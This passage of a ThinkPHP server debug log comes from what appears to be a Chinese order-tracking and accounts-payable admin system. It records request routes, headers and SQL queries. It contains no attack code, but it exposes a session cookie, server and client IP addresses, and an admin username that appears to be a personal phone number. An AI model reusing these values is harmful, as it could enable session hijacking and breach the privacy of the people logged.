'{"suppliercustomer.name":"环球"}', 'op' => '{"suppliercustomer.name":"="}', '_' => '1658309272800', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001666s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000124s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000584s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001488s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000606s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001386s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001393s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001676s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000395s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001713s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001116s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001205s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE ( `suppliercustomer`.`name` = '环球' ) AND `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001227s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE ( `suppliercustomer`.`name` = '环球' ) AND `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.001762s ] --------------------------------------------------------------- [ 2022-07-20T17:28:12+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/addyifu?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1 [运行时间:0.057762s][吞吐率:17.31req/s] [内存消耗:5,260.68kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001468s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'addyifu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.002240s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->addyifu[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/addyifu.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000114s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000498s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001482s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000716s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001507s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001202s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001794s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000442s ] --------------------------------------------------------------- [ 2022-07-20T17:28:12+08:00 ] 106.112.205.110 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658309292 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1658309292 [运行时间:0.033666s][吞吐率:29.70req/s] [内存消耗:3,854.60kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001295s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1658309292', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001613s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000109s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:28:14+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.053242s][吞吐率:18.78req/s] [内存消耗:4,963.20kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001126s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '1', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001525s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007778s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000571s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001462s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000611s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 0,10 [ RunTime:0.000440s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001486s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"1\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658309294) [ RunTime:0.004813s ] --------------------------------------------------------------- [ 2022-07-20T17:28:16+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.052813s][吞吐率:18.93req/s] [内存消耗:4,963.23kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001073s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '2', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001495s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007866s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000492s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001715s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000447s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 10,10 [ RunTime:0.000640s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001462s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"2\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658309296) [ RunTime:0.004946s ] --------------------------------------------------------------- [ 2022-07-20T17:28:16+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.053009s][吞吐率:18.86req/s] [内存消耗:4,963.30kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000063s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001495s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '3', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001550s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.005589s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000585s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001538s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000403s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 20,10 [ RunTime:0.000391s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001384s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"3\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658309296) [ RunTime:0.003002s ] --------------------------------------------------------------- [ 2022-07-20T17:28:18+08:00 ] 106.112.205.110 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.058064s][吞吐率:17.22req/s] [内存消耗:4,963.30kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001181s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '3', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001677s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.011465s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000512s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001451s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000586s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 20,10 [ RunTime:0.000497s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001515s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"3\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658309298) [ RunTime:0.008615s ] --------------------------------------------------------------- [ 2022-07-20T17:28:37+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/addyifu?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1 [运行时间:0.086293s][吞吐率:11.59req/s] [内存消耗:5,535.20kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001186s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'addyifu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '234', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'row' => array ( 'subject_type' => '1', 'suppliercustomer_id' => '77', 'worker_id' => '', 'explain' => '6月份运费', 'paid_money' => '57228', ), ) [ info ] [ LANG ] 